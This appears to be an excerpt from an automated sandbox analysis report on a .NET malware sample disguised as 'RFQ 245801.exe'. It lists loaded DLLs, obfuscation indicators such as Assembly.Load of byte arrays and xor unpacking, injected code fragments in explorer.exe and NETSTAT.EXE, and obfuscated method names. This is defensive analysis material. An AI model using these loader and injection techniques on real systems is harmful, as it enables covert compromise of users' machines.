          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\RFQ 245801.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: RFQ 245801.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: RFQ 245801.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: RFQ 245801.exe, frmTimer.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs.Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs.Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
          Source: 0.2.RFQ 245801.exe.5370000.3.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.RFQ 245801.exe.2b5f4a8.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs.Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.1120f840.0.raw.unpack, frmTimer.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 7.2.NETSTAT.EXE.35ef840.3.raw.unpack, frmTimer.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_029E0E75 pushfd ; iretd 0_2_029E0E79
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 0_2_029E0D50 pushfd ; iretd 0_2_029E0E79
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00416825 push ecx; iretd 5_2_00416829
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_004168EA push ecx; ret 5_2_004168F6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00417116 push ss; iretd 5_2_00417118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00417132 push ecx; iretd 5_2_00417133
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041E9B2 push edx; iretd 5_2_0041E9B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041EA0C push 6B25699Fh; iretd 5_2_0041EA11
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00416B3D push ds; retf 5_2_00416B4E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0040A47D pushad ; ret 5_2_0040A47E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041D4DB push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0041D53C push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_016F225F pushad ; ret 5_2_016F27F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_016F27FA pushad ; ret 5_2_016F27F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx5_2_017209B6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_016F283D push eax; iretd 5_2_016F2858
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6FAB02 push esp; retn 0000h6_2_0F6FAB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6FAB1E push esp; retn 0000h6_2_0F6FAB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0F6FA9B5 push esp; retn 0000h6_2_0F6FAAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBAB9B5 push esp; retn 0000h6_2_0FBABAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBABB1E push esp; retn 0000h6_2_0FBABB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBABB02 push esp; retn 0000h6_2_0FBABB03
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_006460DD push ecx; ret 7_2_006460F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030D09AD push ecx; mov dword ptr [esp], ecx7_2_030D09B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026B7132 push ecx; iretd 7_2_026B7133
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026B7116 push ss; iretd 7_2_026B7118
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026AA47D pushad ; ret 7_2_026AA47E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BD4DB push eax; ret 7_2_026BD542
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BD4D2 push eax; ret 7_2_026BD4D8
          Source: RFQ 245801.exeStatic PE information: section name: .text entropy: 7.932697234212169
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, WgiBpPxEFw5XWqUhVJ.csHigh entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, fJLFWsoNNh2D9wwqVh.csHigh entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Pp6KbidXG6NYFVhHii.csHigh entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.csHigh entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, aSTAvhByNgibKQ2Fu5.csHigh entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, evvAxakZCXhQan771b.csHigh entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.csHigh entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, wIPVxezBCi6yaK1kDK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Vj1PsPUkKgHXmyWVAr.csHigh entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, cR2wkeeEmUg7K1hb5P.csHigh entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, JX4i456yo2MKdam2oZ.csHigh entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, QocsAcjbV9qKLZWBRE.csHigh entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, R6B0AfnmHiIFCScC9n.csHigh entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, gj4fiq0cbqS67yHNi8.csHigh entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, BtID8LccH7jVfw8BjuT.csHigh entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, AWHXGwJvdG0koSWdHq.csHigh entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, jou9lSc2pb66G6VFaAF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, EOWlqHciZCVwJpnRUia.csHigh entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, eXGkH9PtNjZJJbc2dM.csHigh entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Y5N6j8ZlrgTP7fUCew.csHigh entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, WgiBpPxEFw5XWqUhVJ.csHigh entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, fJLFWsoNNh2D9wwqVh.csHigh entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Pp6KbidXG6NYFVhHii.csHigh entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.csHigh entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, aSTAvhByNgibKQ2Fu5.csHigh entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, evvAxakZCXhQan771b.csHigh entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.csHigh entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, wIPVxezBCi6yaK1kDK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Vj1PsPUkKgHXmyWVAr.csHigh entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, cR2wkeeEmUg7K1hb5P.csHigh entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, JX4i456yo2MKdam2oZ.csHigh entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, QocsAcjbV9qKLZWBRE.csHigh entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, R6B0AfnmHiIFCScC9n.csHigh entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, gj4fiq0cbqS67yHNi8.csHigh entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, BtID8LccH7jVfw8BjuT.csHigh entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, AWHXGwJvdG0koSWdHq.csHigh entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, jou9lSc2pb66G6VFaAF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, EOWlqHciZCVwJpnRUia.csHigh entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, eXGkH9PtNjZJJbc2dM.csHigh entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Y5N6j8ZlrgTP7fUCew.csHigh entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, WgiBpPxEFw5XWqUhVJ.csHigh entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
